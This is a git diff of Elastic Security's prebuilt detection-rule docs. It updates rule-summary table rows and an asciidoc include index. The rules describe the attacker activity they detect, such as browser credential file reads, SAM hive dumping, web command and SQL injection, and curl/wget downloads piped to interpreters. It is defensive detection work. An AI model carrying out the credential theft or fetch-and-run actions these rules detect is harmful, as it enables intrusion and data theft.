execution of suspicious shell commands via the Python interpreter. Attackers may use Python to execute shell commands to gain access to the system or to perform other malicious activities, such as credential access, data exfiltration, or lateral movement. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |5 @@ -3440,6 +3466,8 @@ and their rule type is `machine_learning`. |<> |This rule detects suspicious child process activity from a React server application. This could be related to successful exploitation of CVE-2025-55182 or CVE-2025-66478. These vulnerabilities allow attackers to execute remote code due to insecure deserialization of React Server Components (RSC) Flight payloads, leading to unauthenticated RCE on servers running React 19.x or Next.js 14.3.0-canary+, 15.x, and 16.x with the App Router enabled |[Domain: Endpoint], [OS: Linux], [OS: macOS], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Data Source: Elastic Defend], [Data Source: Auditd Manager], [Data Source: SentinelOne], [Data Source: Sysmon], [Resources: Investigation Guide] |None |3 +|<> |This rule detects command lines that reference another process or thread's procfs syscall file. The "/proc//syscall" interface exposes the current syscall arguments, stack pointer, and instruction pointer, which can support process discovery and preparation for process injection. Self and thread-self aliases are excluded. |[Domain: Endpoint], [OS: Linux], [Platform: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |1 + |<> |Identifies remote access to the registry using an account with Backup Operators group membership. This may indicate an attempt to exfiltrate credentials by dumping the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Credential Access], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring], [Data Source: Active Directory], [Data Source: Windows Security Event Logs] |None |218 |<> |Identifies instances where VMware-related files, such as those with extensions like ".vmdk", ".vmx", ".vmxf", ".vmsd", ".vmsn", ".vswp", ".vmss", ".nvram", and ".vmem", are renamed on a Linux system. The rule monitors for the "rename" event action associated with these file types, which could indicate malicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |13 @@ -3492,7 +3520,7 @@ and their rule type is `machine_learning`. |<> |Identifies WMIC allowlist bypass techniques by alerting on suspicious execution of scripts. When WMIC loads scripting libraries it may be indicative of an allowlist bypass. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Defend], [Data Source: Sysmon], [Resources: Investigation Guide] |None |214 -|<> |Identifies the access or file open of web browser sensitive files by an untrusted/unsigned process or osascript. Adversaries may acquire credentials from web browsers by reading files specific to the target browser. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |215 +|<> |Identifies the access or file open of web browser sensitive files by an untrusted/unsigned process or osascript. Adversaries may acquire credentials from web browsers by reading files specific to the target browser. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |216 |<> |A suspicious WerFault child process was detected, which may indicate an attempt to run via the SilentProcessExit registry key manipulation. Verify process details such as command line, network connections and file writes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Microsoft Defender XDR], [Data Source: Sysmon], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |420 @@ -3666,8 +3694,6 @@ and their rule type is `machine_learning`. |<> |This rule detects the execution of the DPKG command by processes not associated with the DPKG package manager. The DPKG command is used to install, remove, and manage Debian packages on a Linux system. Attackers can abuse the DPKG command to install malicious packages on a system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |8 -|<> |This rule leverages alert data from various Discovery building block rules to alert on signals with unusual unique host.id, user.id and process.command_line entries. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide] |None |3 - |<> |This rule leverages Discovery building block rule alert data to alert on signals with unusual unique host.id, user.id and process.executable entries. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: Higher-Order Rule], [Resources: Investigation Guide] |None |4 |<> |Identifies an unexpected executable file being created or modified by a Windows system critical process, which may indicate activity related to remote code execution or other forms of exploitation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender XDR], [Data Source: SentinelOne], [Data Source: Crowdstrike] |None |318 @@ -3682,7 +3708,7 @@ and their rule type is `machine_learning`. |<> |This rule detects unusual file creations from a web server parent process. Adversaries may attempt to create files from a web server parent process to establish persistence, execute malicious scripts, or exfiltrate data. ES|QL rules have limited fields available in its alert documents. Make sure to review the original documents to aid in the investigation of this alert. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Tactic: Command and Control], [Data Source: Elastic Defend], [Rule Type: BBR] |None |9 -|<> |This rule leverages the "new_terms" rule type to detect unusual file creations originating from web server processes on Linux systems. Attackers may exploit web servers to maintain persistence on a compromised system, often resulting in atypical file creations. As file creations from web server processes are common, the "new_terms" rule type approach helps to identify deviations from normal behavior. |[Domain: Endpoint], [Domain: Web], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Tactic: Command and Control], [Tactic: Initial Access], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |1 +|<> |This rule leverages the "new_terms" rule type to detect unusual file creations originating from web server processes on Linux systems. Attackers may exploit web servers to maintain persistence on a compromised system, often resulting in atypical file creations. As file creations from web server processes are common, the "new_terms" rule type approach helps to identify deviations from normal behavior. |[Domain: Endpoint], [Domain: Web], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Tactic: Command and Control], [Tactic: Initial Access], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |2 |<> |Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend], [Data Source: Sysmon], [Resources: Investigation Guide] |None |218 @@ -3752,7 +3778,7 @@ and their rule type is `machine_learning`. |<> |Identifies a suspicious parent child process relationship with cmd.exe descending from an unusual process. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender XDR], [Resources: Investigation Guide] |None |418 -|<> |Identifies Windows programs run from unexpected parent processes. This could indicate masquerading or other strange activity on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender XDR], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike] |None |323 +|<> |Identifies Windows programs run from unexpected parent processes. This could indicate masquerading or other strange activity on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender XDR], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike] |None |324 |<> |Identifies processes modifying the services registry key directly, instead of through the expected Windows APIs. This could be an indication of an adversary attempting to stealthily persist through abnormal service creation or modification of an existing service. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: Microsoft Defender XDR], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |318 @@ -3858,9 +3884,9 @@ and their rule type is `machine_learning`. |<> |This rule leverages the "auditd_manager" integration to detect user or group creation or modification events on Linux systems. Threat actors may attempt to create or modify users or groups to establish persistence on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Auditd Manager], [Resources: Investigation Guide] |None |8 -|<> |This rule detects network events that may indicate the use of VNC traffic from the Internet. VNC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. |[Tactic: Command and Control], [Tactic: Initial Access], [Domain: Endpoint], [Use Case: Threat Detection], [Data Source: PAN-OS], [Data Source: pfSense], [Resources: Investigation Guide] |None |112 +|<> |This rule detects network events that may indicate the use of VNC traffic from the Internet. VNC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. |[Tactic: Command and Control], [Tactic: Initial Access], [Domain: Endpoint], [Use Case: Threat Detection], [Data Source: Fortinet], [Data Source: PAN-OS], [Data Source: pfSense], [Resources: Investigation Guide] |None |113 -|<> |This rule detects network events that may indicate the use of VNC traffic to the Internet. VNC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. |[Tactic: Command and Control], [Tactic: Lateral Movement], [Domain: Endpoint], [Use Case: Threat Detection], [Data Source: PAN-OS], [Data Source: pfSense], [Resources: Investigation Guide] |None |112 +|<> |This rule detects network events that may indicate the use of VNC traffic to the Internet. VNC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. |[Tactic: Command and Control], [Tactic: Lateral Movement], [Domain: Endpoint], [Use Case: Threat Detection], [Data Source: Fortinet], [Data Source: PAN-OS], [Data Source: pfSense], [Resources: Investigation Guide] |None |113 |<> |Identifies potential credential decrypt operations by PowerShell or unsigned processes using the Veeam.Backup.Common.dll library. Attackers can use Veeam Credentials to target backups as part of destructive operations such as Ransomware attacks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |6 @@ -3900,7 +3926,7 @@ and their rule type is `machine_learning`. |<> |This rule detects potential command injection attempts via web server requests by identifying URLs that contain suspicious patterns commonly associated with command execution payloads. Attackers may exploit vulnerabilities in web applications to inject and execute arbitrary commands on the server, often using interpreters like Python, Perl, Ruby, PHP, or shell commands. By monitoring for these indicators in web traffic, security teams can identify and respond to potential threats early. |[Domain: Web], [Use Case: Threat Detection], [Tactic: Reconnaissance], [Tactic: Persistence], [Tactic: Execution], [Tactic: Credential Access], [Tactic: Command and Control], [Data Source: Nginx], [Data Source: Apache], [Data Source: Apache Tomcat], [Data Source: IIS], [Data Source: Traefik], [Resources: Investigation Guide] |None |7 -|<> |This rule detects potential SQL injection attempts in web server requests by identifying common SQL injection patterns in URLs. Such activity may indicate reconnaissance or exploitation attempts by attackers trying to manipulate backend databases or extract sensitive information. |[Domain: Web], [Domain: Network], [Use Case: Threat Detection], [Tactic: Reconnaissance], [Tactic: Credential Access], [Tactic: Persistence], [Tactic: Execution], [Tactic: Command and Control], [Data Source: Nginx], [Data Source: Apache], [Data Source: Apache Tomcat], [Data Source: IIS], [Data Source: Traefik], [Data Source: Zeek], [Resources: Investigation Guide] |None |4 +|<> |This rule detects potential SQL injection attempts in web server requests by identifying common SQL injection patterns in URLs. Such activity may indicate reconnaissance or exploitation attempts by attackers trying to manipulate backend databases or extract sensitive information. |[Domain: Web], [Domain: Network], [Use Case: Threat Detection], [Tactic: Reconnaissance], [Tactic: Credential Access], [Tactic: Persistence], [Tactic: Execution], [Tactic: Command and Control], [Data Source: Nginx], [Data Source: Apache], [Data Source: Apache Tomcat], [Data Source: IIS], [Data Source: Traefik], [Data Source: Zeek], [Resources: Investigation Guide] |None |5 |<> |This rule detects unusual spikes in error response codes (500, 502, 503, 504) from web servers, which may indicate reconnaissance activities such as vulnerability scanning or fuzzing attempts by adversaries. These activities often generate a high volume of error responses as they probe for weaknesses in web applications. Error response codes may potentially indicate server-side issues that could be exploited. |[Domain: Web], [Use Case: Threat Detection], [Tactic: Reconnaissance], [Data Source: Nginx], [Data Source: Apache], [Data Source: Apache Tomcat], [Data Source: IIS], [Data Source: Traefik], [Resources: Investigation Guide] |None |6 diff --git a/docs/detections/prebuilt-rules/rule-desc-index.asciidoc b/docs/detections/prebuilt-rules/rule-desc-index.asciidoc index 9f07ea9dbc..a51b986f85 100644 --- a/docs/detections/prebuilt-rules/rule-desc-index.asciidoc +++ b/docs/detections/prebuilt-rules/rule-desc-index.asciidoc @@ -13,6 +13,7 @@ include::rule-details/aws-bedrock-api-key-used-for-destructive-or-anti-recovery- include::rule-details/aws-bedrock-agent-created-by-iam-user-or-root.asciidoc[] include::rule-details/aws-bedrock-agent-or-action-group-manipulation.asciidoc[] include::rule-details/aws-bedrock-agentcore-execution-role-used-outside-its-runtime.asciidoc[] +include::rule-details/aws-bedrock-agentcore-resource-created-with-iam-execution-role.asciidoc[] include::rule-details/aws-bedrock-agentcore-runtime-prompt-containing-credentials.asciidoc[] include::rule-details/aws-bedrock-agentcore-runtime-prompt-targeting-credentials-or-instance-metadata.asciidoc[] include::rule-details/aws-bedrock-automated-reasoning-safety-policy-tampering.asciidoc[] @@ -51,6 +52,7 @@ include::rule-details/aws-config-resource-deletion.asciidoc[] include::rule-details/aws-configuration-recorder-stopped.asciidoc[] include::rule-details/aws-credentials-searched-for-inside-a-container.asciidoc[] include::rule-details/aws-credentials-used-from-github-actions-and-non-ci-cd-infrastructure.asciidoc[] +include::rule-details/aws-detective-graph-deleted.asciidoc[] include::rule-details/aws-discovery-api-calls-from-vpn-asn-for-the-first-time-by-identity.asciidoc[] include::rule-details/aws-discovery-api-calls-via-cli-from-a-single-resource.asciidoc[] include::rule-details/aws-dynamodb-scan-by-unusual-user.asciidoc[] @@ -82,14 +84,18 @@ include::rule-details/aws-ec2-unauthorized-admin-credential-fetch-via-assumed-ro include::rule-details/aws-ec2-user-data-retrieval-for-ec2-instance.asciidoc[] include::rule-details/aws-ecr-repository-or-registry-policy-granted-public-access.asciidoc[] include::rule-details/aws-efs-file-system-deleted.asciidoc[] +include::rule-details/aws-eks-access-entry-created-then-deleted-by-same-identity.asciidoc[] include::rule-details/aws-eks-access-entry-granted-cluster-admin-policy.asciidoc[] include::rule-details/aws-eks-access-entry-modified.asciidoc[] include::rule-details/aws-eks-control-plane-logging-disabled.asciidoc[] include::rule-details/aws-eventbridge-rule-disabled-or-deleted.asciidoc[] include::rule-details/aws-first-occurrence-of-sts-getfederationtoken-request-by-user.asciidoc[] +include::rule-details/aws-getfederationtoken-followed-by-console-login-via-federation-exchange.asciidoc[] include::rule-details/aws-guardduty-detection-suppression.asciidoc[] include::rule-details/aws-guardduty-detector-deletion.asciidoc[] include::rule-details/aws-guardduty-member-account-manipulation.asciidoc[] +include::rule-details/aws-guardduty-publishing-destination-deleted.asciidoc[] +include::rule-details/aws-guardduty-threat-intelligence-set-deleted.asciidoc[] include::rule-details/aws-iam-api-calls-via-temporary-session-tokens.asciidoc[] include::rule-details/aws-iam-account-password-policy-deleted.asciidoc[] include::rule-details/aws-iam-administratoraccess-policy-attached-to-group.asciidoc[] @@ -170,6 +176,8 @@ include::rule-details/aws-s3-object-encryption-using-external-kms-key.asciidoc[] include::rule-details/aws-s3-object-versioning-suspended.asciidoc[] include::rule-details/aws-s3-static-site-javascript-file-uploaded.asciidoc[] include::rule-details/aws-s3-unauthenticated-bucket-access-by-rare-source.asciidoc[] +include::rule-details/aws-ses-email-identity-verified-then-deleted.asciidoc[] +include::rule-details/aws-ses-full-access-policy-attached-to-iam-entity-by-unusual-user.asciidoc[] include::rule-details/aws-sns-rare-protocol-subscription-by-user.asciidoc[] include::rule-details/aws-sns-topic-created-by-rare-user.asciidoc[] include::rule-details/aws-sns-topic-message-publish-by-rare-user.asciidoc[] @@ -345,6 +353,7 @@ include::rule-details/behavior-detected-elastic-defend.asciidoc[] include::rule-details/behavior-prevented-elastic-defend.asciidoc[] include::rule-details/binary-content-copy-via-cmd-exe.asciidoc[] include::rule-details/binary-executed-from-shared-memory-directory.asciidoc[] +include::rule-details/binfmt-configuration-file-creation.asciidoc[] include::rule-details/bitsadmin-activity.asciidoc[] include::rule-details/boot-file-copy.asciidoc[] include::rule-details/browser-extension-install.asciidoc[] @@ -353,6 +362,7 @@ include::rule-details/bypass-uac-via-event-viewer.asciidoc[] include::rule-details/cassandra-javascript-udf-creation.asciidoc[] include::rule-details/chkconfig-service-add.asciidoc[] include::rule-details/chroot-execution-in-container-context-on-linux.asciidoc[] +include::rule-details/claude-cowork-vm-boot-image-tamper.asciidoc[] include::rule-details/clearing-windows-console-history.asciidoc[] include::rule-details/clearing-windows-event-logs.asciidoc[] include::rule-details/cloud-instance-metadata-credential-path-http-request.asciidoc[] @@ -416,22 +426,15 @@ include::rule-details/default-cobalt-strike-team-server-certificate.asciidoc[] include::rule-details/delayed-execution-via-ping.asciidoc[] include::rule-details/delegated-managed-service-account-modification-by-an-unusual-user.asciidoc[] include::rule-details/delete-volume-usn-journal-with-fsutil.asciidoc[] -include::rule-details/deprecated-adobe-hijack-persistence.asciidoc[] -include::rule-details/deprecated-encoded-executable-stored-in-the-registry.asciidoc[] include::rule-details/deprecated-m365-exchange-dlp-policy-deleted.asciidoc[] -include::rule-details/deprecated-m365-security-compliance-email-reported-by-user-as-malware-or-phish.asciidoc[] include::rule-details/deprecated-m365-security-compliance-potential-ransomware-activity.asciidoc[] include::rule-details/deprecated-m365-security-compliance-unusual-volume-of-file-deletion.asciidoc[] include::rule-details/deprecated-m365-security-compliance-user-restricted-from-sending-email.asciidoc[] include::rule-details/deprecated-m365-teams-external-access-enabled.asciidoc[] include::rule-details/deprecated-m365-teams-guest-access-enabled.asciidoc[] -include::rule-details/deprecated-mfa-disabled-for-google-workspace-organization.asciidoc[] include::rule-details/deprecated-microsoft-exchange-transport-agent-install-script.asciidoc[] -include::rule-details/deprecated-potential-powershell-obfuscated-script.asciidoc[] include::rule-details/deprecated-powershell-script-with-discovery-capabilities.asciidoc[] include::rule-details/deprecated-powershell-script-with-remote-execution-capabilities-via-winrm.asciidoc[] -include::rule-details/deprecated-sunburst-command-and-control-activity.asciidoc[] -include::rule-details/deprecated-suspicious-printspooler-service-executable-file-creation.asciidoc[] include::rule-details/deprecated-unusual-discovery-activity-by-user.asciidoc[] include::rule-details/deprecated-tls-version-or-weak-cipher-negotiated-externally.asciidoc[] include::rule-details/detection-alert-on-a-process-exhibiting-cpu-spike.asciidoc[] @@ -590,6 +593,7 @@ include::rule-details/file-creation-in-var-log-via-suspicious-process.asciidoc[] include::rule-details/file-creation-in-world-writable-directory-by-unusual-process.asciidoc[] include::rule-details/file-creation-execution-and-self-deletion-in-suspicious-directory.asciidoc[] include::rule-details/file-deletion-via-shred.asciidoc[] +include::rule-details/file-downloaded-by-curl-wget-and-piped-to-interpreter.asciidoc[] include::rule-details/file-permission-modification-in-writable-directory.asciidoc[] include::rule-details/file-staged-in-root-folder-of-recycle-bin.asciidoc[] include::rule-details/file-system-debugger-launched-inside-a-container.asciidoc[] @@ -611,6 +615,7 @@ include::rule-details/first-occurrence-of-personal-access-token-pat-use-for-a-gi include::rule-details/first-occurrence-of-private-repo-event-from-specific-github-personal-access-token-pat.asciidoc[] include::rule-details/first-occurrence-of-user-agent-for-a-github-personal-access-token-pat.asciidoc[] include::rule-details/first-occurrence-of-user-agent-for-a-github-user.asciidoc[] +include::rule-details/first-seen-sonicwall-remote-access-login-by-user-and-source.asciidoc[] include::rule-details/first-time-aws-cloudformation-stack-creation.asciidoc[] include::rule-details/first-time-python-accessed-sensitive-credential-files.asciidoc[] include::rule-details/first-time-python-created-a-launchagent-or-launchdaemon.asciidoc[] @@ -654,6 +659,7 @@ include::rule-details/gcp-pub-sub-subscription-creation.asciidoc[] include::rule-details/gcp-pub-sub-subscription-deletion.asciidoc[] include::rule-details/gcp-pub-sub-topic-creation.asciidoc[] include::rule-details/gcp-pub-sub-topic-deletion.asciidoc[] +include::rule-details/gcp-secret-manager-listsecrets-across-multiple-projects.asciidoc[] include::rule-details/gcp-service-account-creation.asciidoc[] include::rule-details/gcp-service-account-deletion.asciidoc[] include::rule-details/gcp-service-account-disabled.asciidoc[] @@ -702,7 +708,6 @@ include::rule-details/gke-secret-get-or-list-with-suspicious-user-agent.asciidoc include::rule-details/gke-secrets-list-from-unusual-source-as-organization.asciidoc[] include::rule-details/gke-sensitive-rbac-change-followed-by-workload-modification.asciidoc[] include::rule-details/gke-service-account-modified-rbac-objects.asciidoc[] -include::rule-details/gke-service-account-token-created-via-tokenrequest-api.asciidoc[] include::rule-details/gke-suspicious-assignment-of-controller-service-account.asciidoc[] include::rule-details/gke-suspicious-self-subject-review-via-service-account.asciidoc[] include::rule-details/gke-unusual-sensitive-workload-modification.asciidoc[] @@ -785,7 +790,6 @@ include::rule-details/ibm-qradar-external-alerts.asciidoc[] include::rule-details/icmp-redirect-message-from-internal-host.asciidoc[] include::rule-details/icmp-timestamp-or-information-request-from-the-internet.asciidoc[] include::rule-details/iis-http-logging-disabled.asciidoc[] -include::rule-details/ipsec-nat-traversal-port-activity.asciidoc[] include::rule-details/ipv4-ipv6-forwarding-activity.asciidoc[] include::rule-details/image-file-execution-options-injection.asciidoc[] include::rule-details/image-loaded-with-invalid-signature.asciidoc[] @@ -849,7 +853,6 @@ include::rule-details/kubernetes-container-created-with-excessive-linux-capabili include::rule-details/kubernetes-coredns-or-kube-dns-configuration-modified.asciidoc[] include::rule-details/kubernetes-creation-of-a-rolebinding-referencing-a-serviceaccount.asciidoc[] include::rule-details/kubernetes-creation-or-modification-of-sensitive-role.asciidoc[] -include::rule-details/kubernetes-denied-service-account-request-via-unusual-user-agent.asciidoc[] include::rule-details/kubernetes-direct-api-request-via-curl-or-wget.asciidoc[] include::rule-details/kubernetes-ephemeral-container-added-to-pod.asciidoc[] include::rule-details/kubernetes-events-deleted.asciidoc[] @@ -884,7 +887,6 @@ include::rule-details/kubernetes-service-account-token-created-via-tokenrequest- include::rule-details/kubernetes-static-pod-manifest-file-access.asciidoc[] include::rule-details/kubernetes-suspicious-assignment-of-controller-service-account.asciidoc[] include::rule-details/kubernetes-suspicious-self-subject-review-via-unusual-user-agent.asciidoc[] -include::rule-details/kubernetes-unusual-decision-by-user-agent.asciidoc[] include::rule-details/kubernetes-user-exec-into-pod.asciidoc[] include::rule-details/kubernetes-and-cloud-credential-path-access-via-process-arguments.asciidoc[] include::rule-details/lsass-memory-dump-creation.asciidoc[] @@ -1084,6 +1086,7 @@ include::rule-details/newly-observed-elastic-defend-behavior-alert.asciidoc[] include::rule-details/newly-observed-fortigate-alert.asciidoc[] include::rule-details/newly-observed-high-severity-detection-alert.asciidoc[] include::rule-details/newly-observed-high-severity-suricata-alert.asciidoc[] +include::rule-details/newly-observed-ipsec-nat-traversal-peer.asciidoc[] include::rule-details/newly-observed-palo-alto-network-alert.asciidoc[] include::rule-details/newly-observed-process-exhibiting-high-cpu-usage.asciidoc[] include::rule-details/newly-observed-rc4-kerberos-service-ticket-request.asciidoc[] @@ -1187,6 +1190,8 @@ include::rule-details/potential-dga-activity.asciidoc[] include::rule-details/potential-dhcp-starvation-via-high-client-mac-cardinality.asciidoc[] include::rule-details/potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc[] include::rule-details/potential-dns-exfiltration-via-excessive-chunked-queries.asciidoc[] +include::rule-details/potential-dns-rebinding-from-public-to-private-address.asciidoc[] +include::rule-details/potential-dns-tunneling-via-long-and-unique-subdomains.asciidoc[] include::rule-details/potential-dns-tunneling-via-nslookup.asciidoc[] include::rule-details/potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc[] include::rule-details/potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc[] @@ -1210,6 +1215,7 @@ include::rule-details/potential-edr-freeze-via-werfaultsecure-abuse.asciidoc[] include::rule-details/potential-enumeration-via-active-directory-web-service.asciidoc[] include::rule-details/potential-escalation-via-vulnerable-msi-repair.asciidoc[] include::rule-details/potential-etherhiding-c2-via-blockchain-connection.asciidoc[] +include::rule-details/potential-evasion-via-boot-time-removal-tool.asciidoc[] include::rule-details/potential-evasion-via-filter-manager.asciidoc[] include::rule-details/potential-evasion-via-windows-filtering-platform.asciidoc[] include::rule-details/potential-execution-of-rc-local-script.asciidoc[] @@ -1229,10 +1235,11 @@ include::rule-details/potential-hex-payload-execution-via-common-utility.asciido include::rule-details/potential-hidden-local-user-account-creation.asciidoc[] include::rule-details/potential-hidden-process-via-mount-hidepid.asciidoc[] include::rule-details/potential-icmp-tunneling-activity-to-the-internet.asciidoc[] +include::rule-details/potential-iis-web-shell-file-creation.asciidoc[] include::rule-details/potential-impersonation-attempt-via-kubectl.asciidoc[] include::rule-details/potential-internal-linux-ssh-brute-force-detected.asciidoc[] include::rule-details/potential-invoke-mimikatz-powershell-script.asciidoc[] -include::rule-details/potential-java-jndi-exploitation-attempt.asciidoc[] +include::rule-details/potential-java-service-exploitation-via-suspicious-child-process.asciidoc[] include::rule-details/potential-kerberos-attack-via-bifrost.asciidoc[] include::rule-details/potential-kerberos-coercion-via-dns-based-spn-spoofing.asciidoc[] include::rule-details/potential-kerberos-relay-attack-against-a-computer-account.asciidoc[] @@ -1364,6 +1371,7 @@ include::rule-details/potential-ssh-reverse-port-forwarding.asciidoc[] include::rule-details/potential-syn-based-port-scan-detected.asciidoc[] include::rule-details/potential-secret-scanning-via-gitleaks.asciidoc[] include::rule-details/potential-secure-file-deletion-via-sdelete-utility.asciidoc[] +include::rule-details/potential-self-signed-tls-certificate-recently-issued-on-external-connection.asciidoc[] include::rule-details/potential-shadow-credentials-added-to-ad-object.asciidoc[] include::rule-details/potential-shadow-file-read-via-command-line-utilities.asciidoc[] include::rule-details/potential-sharprdp-behavior.asciidoc[] @@ -1389,7 +1397,6 @@ include::rule-details/potential-viewstate-rce-attempt-on-sharepoint-iis.asciidoc include::rule-details/potential-veeam-credential-access-command.asciidoc[] include::rule-details/potential-wpad-spoofing-via-dns-record-creation.asciidoc[] include::rule-details/potential-wsus-abuse-for-lateral-movement.asciidoc[] -include::rule-details/potential-web-shell-aspx-file-creation.asciidoc[] include::rule-details/potential-webshell-deployed-via-apache-struts-cve-2023-50164-exploitation.asciidoc[] include::rule-details/potential-widespread-malware-infection-across-multiple-hosts.asciidoc[] include::rule-details/potential-windows-error-manager-masquerading.asciidoc[] @@ -1446,6 +1453,7 @@ include::rule-details/process-created-with-an-elevated-token.asciidoc[] include::rule-details/process-creation-via-secondary-logon.asciidoc[] include::rule-details/process-discovery-using-built-in-tools.asciidoc[] include::rule-details/process-discovery-via-built-in-applications.asciidoc[] +include::rule-details/process-execution-followed-by-self-deletion.asciidoc[] include::rule-details/process-execution-from-an-unusual-directory.asciidoc[] include::rule-details/process-injection-detected-elastic-endgame.asciidoc[] include::rule-details/process-injection-prevented-elastic-endgame.asciidoc[] @@ -1519,6 +1527,8 @@ include::rule-details/smb-windows-file-sharing-activity-from-the-internet.asciid include::rule-details/smb-windows-file-sharing-activity-to-the-internet.asciidoc[] include::rule-details/smb-connections-via-lolbin-or-untrusted-process.asciidoc[] include::rule-details/smtp-to-the-internet-on-port-26-tcp.asciidoc[] +include::rule-details/ssfilecopyreceiver-writing-to-common-persistence-locations.asciidoc[] +include::rule-details/ssfilecopysender-executed-as-root.asciidoc[] include::rule-details/ssh-authorized-keys-file-activity.asciidoc[] include::rule-details/ssh-authorized-keys-file-deletion.asciidoc[] include::rule-details/ssh-key-generated-via-ssh-keygen.asciidoc[] @@ -1631,6 +1641,7 @@ include::rule-details/suspicious-calendar-file-modification.asciidoc[] include::rule-details/suspicious-certutil-commands.asciidoc[] include::rule-details/suspicious-child-execution-via-web-server.asciidoc[] include::rule-details/suspicious-child-process-of-adobe-acrobat-reader-update-service.asciidoc[] +include::rule-details/suspicious-child-process-of-papercut-server-component.asciidoc[] include::rule-details/suspicious-child-process-via-azure-vm-customscript-extension.asciidoc[] include::rule-details/suspicious-cmd-execution-via-wmi.asciidoc[] include::rule-details/suspicious-command-execution-via-busybox-proxy.asciidoc[] @@ -1671,6 +1682,7 @@ include::rule-details/suspicious-installer-package-spawns-network-event.asciidoc include::rule-details/suspicious-instance-metadata-service-imds-api-command-line-execution.asciidoc[] include::rule-details/suspicious-instance-metadata-service-imds-api-request.asciidoc[] include::rule-details/suspicious-inter-process-communication-via-outlook.asciidoc[] +include::rule-details/suspicious-java-class-file-created-in-papercut-server-library.asciidoc[] include::rule-details/suspicious-javascript-execution-via-deno.asciidoc[] include::rule-details/suspicious-jetbrains-teamcity-child-process.asciidoc[] include::rule-details/suspicious-kerberos-authentication-ticket-request.asciidoc[] @@ -1707,10 +1719,12 @@ include::rule-details/suspicious-print-spooler-spl-file-created.asciidoc[] include::rule-details/suspicious-proc-pseudo-file-system-enumeration.asciidoc[] include::rule-details/suspicious-process-access-via-direct-system-call.asciidoc[] 